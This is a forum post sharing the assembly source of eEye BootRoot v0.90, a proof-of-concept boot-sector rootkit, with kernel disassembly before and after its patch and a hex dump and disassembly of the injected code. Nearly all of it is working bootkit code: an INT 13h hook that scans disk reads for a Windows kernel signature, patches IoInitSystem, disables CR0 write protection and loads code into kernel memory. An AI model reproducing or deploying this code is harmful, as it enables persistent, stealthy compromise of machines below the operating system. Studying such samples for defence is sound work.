eEye MBR Code

JM Safe

Level 39
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Top Poster
Apr 12, 2015
Hi everyone.
In this thread I want to share with you the assembly code of this sample: eEye BootRoot v 0.90

; eEye BootRoot v0.90                  Last updated: 08/08/2005
; Demonstration of the capabilities of custom boot sector code
; on a Windows NT-family system.
; Derek Soeder - eEye Digital Security - 04/02/2005
.model tiny
BOOTORG EQU 7C00h                        ; our code is executed by the BIOS at 0000h:7C00h
BRCODE16 SEGMENT byte use16
;##  Boot-Time Installation Code  ##
    ; Initialization


    xor        bx, bx
    mov        ss, bx
    mov        ss:[BOOTORG - 2], sp
    mov        sp, (BOOTORG - 2)
    push        ds


    mov        ds, bx
    ; Reserve 1KB conventional memory for our memory-resident code
    dec        word ptr ds:[0413h]            ; 0040h:0013h - base memory size in KBs
    mov        ax, ds:[0413h]
    shl        ax, (10-4)                ; AX *= 1024 / 16 (convert linear address in KBs to a segment)


    mov        es, ax
    ; Copy ourselves to reserved memory and initialize the rest to zeroes
    mov        si, BOOTORG
    xor        di, di
    mov        cx, BOOTROOT_SIZE / 2
    rep movsw
    xor        ax, ax
    mov        ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
    rep stosw


    ; Install our INT 13h hook
    mov        eax, ds:[bx + (13h*4)]
    mov        es:[INT13HANDLER - @BRCODE16_START], eax    ; store previous handler
    mov        word ptr [bx + (13h*4)], @Int13Hook    ; point INT 13h vector to our hook handler
    mov        [bx + (13h*4) + 2], es            ; (BX = 0 from earlier)
    ; Load and execute MBR from first hard drive (do this from resident code)
    push        es
    push        @BootFromHDD
    mov        es, cx                    ; CX = 0 from above REP STOSW
    mov        ax, 0201h                ; AL = number of sectors
    inc        cx                    ; CH = cylinder; CL = sector and high bits of cylinder
    mov        dx, 0080h                ; DH = head; DL = drive number
    mov        bh, (BOOTORG / 100h)            ; ES:BX -> destination buffer
    int        13h                    ; INT 13h/AH=02h: Read sector(s) into memory
    pop        ds
    pop        sp
    db        0EAh                    ; JMP FAR 0000h:7C00h
    dw        BOOTORG, 0000h


;##  INT 13h Hook Real-Mode ISR  ##
    cmp        ah, 42h                    ; IBM/MS INT 13 Extensions - EXTENDED READ
    je        short @Int13Hook_ReadRequest
    cmp        ah, 02h                    ; DISK - READ SECTOR(S) INTO MEMORY
    je        short @Int13Hook_ReadRequest
    db        0EAh                    ; JMP FAR INT13HANDLER
    dd        ?
    mov        byte ptr cs:[INT13LASTFUNCTION], ah
    ; Invoke original handler to perform read operation
    pushf                            ; push Flags because we're simulating an INT
    call        dword ptr cs:[INT13HANDLER]        ; call original handler
    jc        short @Int13Hook_ret            ; abort immediately if read failed
    push        es
    mov        ah, 00h
    cmp        ah, 42h
    jne        short @Int13Hook_notextread
    lodsw                            ; +02h  WORD    number of blocks to transfer
    les        bx, [si]                ; +04h  DWORD   transfer buffer
    ; Scan sector for a signature of the code we want to modify
    test        al, al
    jle        short @Int13Hook_scan_done
    mov        cl, al
    mov        al, 8Bh
    shl        cx, 9                    ; (AL * 200h)
    mov        di, bx
                                ; 8B F0       MOV ESI, EAX
                                ; 85 F6       TEST ESI, ESI
                                ; 74 21       JZ $+23h
                                ; 80 3D ...   CMP BYTE PTR [ofs32], imm8
                                ; (the first 6 bytes of this signature exist in other modules!)
    repne scasb
    jne        short @Int13Hook_scan_done
    cmp        dword ptr es:[di], 74F685F0h
    jne        short @Int13Hook_scan_loop
    cmp        word ptr es:[di+4], 8021h
    jne        short @Int13Hook_scan_loop
    mov        word ptr es:[di-1], 15FFh        ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
    mov        eax, cs
    shl        eax, 4
    add        ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE
    mov        cs:[PATCHFUNC32_LINEAR], eax        ; should be okay to add to AX, since we can't cross 1KB boundary
    add        ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE)
    mov        es:[di+1], eax
    pop        es
    retf 2                            ; discard saved Flags from original INT (pass back CF, etc.)


This is the original kernel code:

806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19             push    0x19
806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
806a0a9c 6a4b             push    0x4b
806a0a9e 6a19             push    0x19
806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]

806a0aab e844e6ffff       call    nt!IoInitSystem (8069f0f4)

806a0ab0 84c0             test    al,al
806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64             push    0x64
806a0aba 53               push    ebx
806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00       mov     esi,0xf003f
806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
806a0ae3 56               push    esi
806a0ae4 6a02             push    0x2
806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
806a0aeb 6a50             push    0x50
806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01             push    0x1
806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
806a0b03 84c0             test    al,al
806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56               push    esi

Here is the Patched Kernel Code:

806a0a79 0f85d9dcffff     jne     nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100       call    nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19             push    0x19
806a0a86 e83af1e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff     push    dword ptr [ebp-0x470]
806a0a91 891d78cb5480     mov     [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000       call    nt!XIPInit (806afe6a)
806a0a9c 6a4b             push    0x4b
806a0a9e 6a19             push    0x19
806a0aa0 e83cf1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff     push    dword ptr [ebp-0x470]

806a0aab e850b30400       call    806ebe00

806a0ab0 84c0             test    al,al
806a0ab2 0f84e7dcffff     je      nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64             push    0x64
806a0aba 53               push    ebx
806a0abb e821f1e6ff       call    nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580     cmp     [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00       mov     esi,0xf003f
806a0acb 0f85d5dcffff     jne     nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580     cmp     [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff     jne     nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff     mov     esi,[ebp-0x470]
806a0ae3 56               push    esi
806a0ae4 6a02             push    0x2
806a0ae6 e82c020000       call    nt!MmInitSystem (806a0d17)
806a0aeb 6a50             push    0x50
806a0aed e8d3f0e6ff       call    nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000       call    nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000       call    nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01             push    0x1
806a0afe e85cf1ffff       call    nt!PoInitSystem (8069fc5f)
806a0b03 84c0             test    al,al
806a0b05 0f8419daffff     je      nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56               push    esi
806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e  ...............~
806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd  ................
806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d  ......d........}
806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0  .........E..@...
806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa  .......@........
806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75  .j.P...........u
806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd  .......P.6......
806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85  ..d.$...........
806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1  .....H49........
806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff  ..@I...T.@......
806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80  ..$h..i...$h.pM.  <--- hooked nt!IoInitSystem
806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f  . .P%.....".+.X.
806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59  "..4$hb..7.;...Y
806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00  Yh....j...`.....
806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00  ^.....jjY.......
806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08  .....3.a.t$..T$.
806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b  YZ`...R...`.l$(.
806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd  E<.T.x...J..Z ..
806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4  .2I.4...3..3..:.
806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b  t........;|$$u..
806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b  Z$..f..K.Z......
806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8  ....3..D$.a.[Uh.
806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26  t)...3.RR..R...&
806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79  ...\.?.?.\.P.h.y
806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69  .s.i.c.a.l.D.r.i
806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc  .v.e.0...h$.&...
806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51  RRj@QRj...j j.VQ
806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3  h....W..Uhb..7..
806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00  .Uh........h....
806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51  h......j.Q.....Q
806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff  Qj...PV...3.RRR.
806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24  t$X..Uh_L.....t$
806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00  @...F<..P.PPRRj.
806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3  ...YW2..._X`.HT.
806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00  .a+.....H.......
806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83  `.r..z..J.....a.
806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab  .(..P`..........
806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24  aUh..H....V...t$
806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0  ...$....W.F(....
806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57  ..}..NP..2.W.._W
806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00  ....`3..........
806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00  ...a............
806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00  MZ..............  <--- 806ec000 806ffd80 hal
806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00  ................
806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68  ........!..L.!Th
806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f  is program canno
806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20  t be run in DOS
806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  mode....$.......

806ebe00 8b1424           mov     edx,[esp]
806ebe03 68f4f06980       push    0x8069f0f4
806ebe08 8b0c24           mov     ecx,[esp]
806ebe0b 6800704d80       push    0x804d7000
806ebe10 0f20c0           mov     eax,cr0
806ebe13 50               push    eax
806ebe14 25fffffeff       and     eax,0xfffeffff
806ebe19 0f22c0           mov     cr0,eax            ; disable code write protection
806ebe1c 2bca             sub     ecx,edx
806ebe1e 58               pop     eax
806ebe1f 0f22c0           mov     cr0,eax
806ebe22 ff3424           push    dword ptr [esp]
806ebe25 6862e00737       push    0x3707e062
806ebe2a e83b000000       call    806ebe6a
806ebe2f 59               pop     ecx
806ebe30 59               pop     ecx
806ebe31 68ab010000       push    0x1ab
806ebe36 6a00             push    0x0
806ebe38 ffd0             call    eax {nt!ExAllocatePool (8050fd66)}
806ebe3a 60               pushad
806ebe3b e800000000       call    806ebe40
806ebe40 5e               pop     esi
806ebe41 83c615           add     esi,0x15
806ebe44 8bf8             mov     edi,eax
806ebe46 6a6a             push    0x6a
806ebe48 59               pop     ecx
806ebe49 f3a5             rep     movsd
806ebe4b b180             mov     cl,0x80
806ebe4d 8dbe00feffff     lea     edi,[esi-0x200]
806ebe53 ffe0             jmp     eax {81bf06d0}

81bf06d0 33c0             xor     eax,eax
81bf06d2 61               popad
81bf06d3 ff74240c         push    dword ptr [esp+0xc]
81bf06d7 ff542408         call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4
81bf06db 59               pop     ecx
81bf06dc 5a               pop     edx
81bf06dd 60               pushad
81bf06de 87cd             xchg    ebp,ecx
81bf06e0 e852000000       call    81bf0737
81bf06e5 60               pushad
81bf06e6 8b6c2428         mov     ebp,[esp+0x28]
81bf06ea 8b453c           mov     eax,[ebp+0x3c]
81bf06ed 8b540578         mov     edx,[ebp+eax+0x78]
81bf06f1 03d5             add     edx,ebp
81bf06f3 8b4a18           mov     ecx,[edx+0x18]
81bf06f6 8b5a20           mov     ebx,[edx+0x20]
81bf06f9 03dd             add     ebx,ebp
81bf06fb e332             jecxz   81bf072f
81bf06fd 49               dec     ecx
81bf06fe 8b348b           mov     esi,[ebx+ecx*4]
81bf0701 03f5             add     esi,ebp
81bf0703 33ff             xor     edi,edi
81bf0705 fc               cld
81bf0706 33c0             xor     eax,eax
81bf0708 ac               lodsb
81bf0709 3ac4             cmp     al,ah
81bf070b 7407             jz      81bf0714
81bf070d c1cf0d           ror     edi,0xd
81bf0710 03f8             add     edi,eax
81bf0712 ebf2             jmp     81bf0706
81bf0714 3b7c2424         cmp     edi,[esp+0x24]
81bf0718 75e1             jnz     81bf06fb
81bf071a 8b5a24           mov     ebx,[edx+0x24]
81bf071d 03dd             add     ebx,ebp
81bf071f 668b0c4b         mov     cx,[ebx+ecx*2]
81bf0723 8b5a1c           mov     ebx,[edx+0x1c]
81bf0726 03dd             add     ebx,ebp
81bf0728 8b048b           mov     eax,[ebx+ecx*4]
81bf072b 03c5             add     eax,ebp
81bf072d eb02             jmp     81bf0731
81bf072f 33c0             xor     eax,eax
81bf0731 8944241c         mov     [esp+0x1c],eax
81bf0735 61               popad
81bf0736 c3               ret

Thank you all for reading... ;)

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